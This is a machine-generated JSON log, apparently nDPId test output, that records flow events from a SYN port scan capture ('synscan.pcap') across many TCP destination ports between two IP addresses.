+00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1799,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061109,"flow_last_seen":1278275061109,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":50636,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1614,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060899,"flow_last_seen":1278275060899,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":7627,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1614,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060899,"flow_last_seen":1278275060899,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":7627,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1858,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061210,"flow_last_seen":1278275061210,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":50636,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1858,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061210,"flow_last_seen":1278275061210,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":50636,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":370,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058845,"flow_last_seen":1278275058845,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":44501,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":370,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058845,"flow_last_seen":1278275058845,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":44501,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":90,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057965,"flow_last_seen":1278275057965,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":17877,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":90,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057965,"flow_last_seen":1278275057965,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":17877,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":414,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058971,"flow_last_seen":1278275058971,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":44501,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":414,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058971,"flow_last_seen":1278275058971,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":44501,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00649{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1773,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061105,"flow_last_seen":1278275061105,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1494,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"Citrix","breed":"Acceptable","category":"Network"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1773,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061105,"flow_last_seen":1278275061105,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1494,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1021,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060066,"flow_last_seen":1278275060066,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":13782,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1021,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060066,"flow_last_seen":1278275060066,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":13782,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":119,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058095,"flow_last_seen":1278275058095,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":17877,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":119,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058095,"flow_last_seen":1278275058095,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":17877,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00649{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1836,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061206,"flow_last_seen":1278275061206,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1494,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"Citrix","breed":"Acceptable","category":"Network"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1836,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061206,"flow_last_seen":1278275061206,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1494,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1175,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060287,"flow_last_seen":1278275060287,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":13783,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1175,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060287,"flow_last_seen":1278275060287,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":13783,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1084,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060175,"flow_last_seen":1278275060175,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":13782,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1084,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060175,"flow_last_seen":1278275060175,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":13782,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1232,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060388,"flow_last_seen":1278275060388,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":13783,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1232,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060388,"flow_last_seen":1278275060388,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":13783,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":688,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059566,"flow_last_seen":1278275059566,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3546,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":688,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059566,"flow_last_seen":1278275059566,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3546,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":759,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059675,"flow_last_seen":1278275059675,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3546,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":759,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059675,"flow_last_seen":1278275059675,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3546,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1488,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060698,"flow_last_seen":1278275060698,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1500,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1488,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060698,"flow_last_seen":1278275060698,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1500,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1561,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060801,"flow_last_seen":1278275060801,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1500,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1561,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060801,"flow_last_seen":1278275060801,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1500,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1244,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060388,"flow_last_seen":1278275060388,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1501,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1244,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060388,"flow_last_seen":1278275060388,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1501,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1316,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060491,"flow_last_seen":1278275060491,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1501,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1316,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060491,"flow_last_seen":1278275060491,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1501,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1482,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060698,"flow_last_seen":1278275060698,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1503,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1482,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060698,"flow_last_seen":1278275060698,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1503,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1256,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060389,"flow_last_seen":1278275060389,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3551,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1256,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060389,"flow_last_seen":1278275060389,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3551,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1567,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060801,"flow_last_seen":1278275060801,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1503,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1567,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060801,"flow_last_seen":1278275060801,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1503,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1304,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060490,"flow_last_seen":1278275060490,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3551,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1304,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060490,"flow_last_seen":1278275060490,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3551,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":96,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057965,"flow_last_seen":1278275057965,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":65000,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
